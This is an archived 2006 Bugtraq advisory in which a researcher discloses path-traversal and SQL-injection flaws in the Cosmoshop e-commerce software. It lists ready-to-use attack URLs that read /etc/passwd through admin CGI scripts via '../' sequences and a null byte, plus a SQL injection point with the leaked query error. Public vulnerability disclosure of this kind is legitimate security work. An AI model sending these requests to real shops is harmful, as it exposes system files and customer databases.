| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060518063215.14087.qmail@securityfocus.com> Date: 18 May 2006 06:32:15 -0000 From: innate@....de To: bugtraq@...urityfocus.com Subject: [cosmoshop again] sql injection + view all files as admin user i am: l0om page: www.excluded.org product: cosmoshop 1) show all files as admin-user 2) sql injection Cosmoshop - Lse (<= )V8.11.106 1) Show all files as an admin-user: /cgi-bin/admin/bestellvorgang/edit_mailtexte.cgi?file=../../../../../../../../../etc/passwd%00 /cgi-bin/admin/bestmail.cgi?action=view&file=../../../../../../../etc/passwd%00 2) SQL Injection cgi-bin/lshop.cgi?action=showdetail&artnum=10[' UNION SELECT OR OTHER SQL]&wkid=2002g&ls=d&nocache= get_artikel_from_db: Fehler bei SELECT artnum,artpreis,artzub,artbild,artmwst,artlayout,artangebot, artlieferzeit,artinaktiv,artrabattgruppe,special_price,artneu,artstaffel,artpreis_ek,artdate,artbestand, artbestand_min,artbestand_ignore,artgewicht_netto,artgewicht_brutto,artnum2,artlieferant,artd_abverkauf, artd_lieferzeit,artlieferdatum,artpreiswunsch,artebay,artnam,artdesc,artausf_1,artausf_2 FROM shopartikel as a LEFT JOIN shopartikelcontent AS ac ON (a.artnum=ac.artnr AND ac.sprache ='d') WHERE 1 AND artnum='10'' <-- you enter here :You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''10''' at line 1 in sub: main::get_artikel_from_db (<FULL PATH HERE>/lib/lshopartikel_sql.pm, line 257) called by: main::get_artikel_content_by_id hopefully this time cosmoshop will be fixed best wishes, l0om
Powered by blists - more mailing lists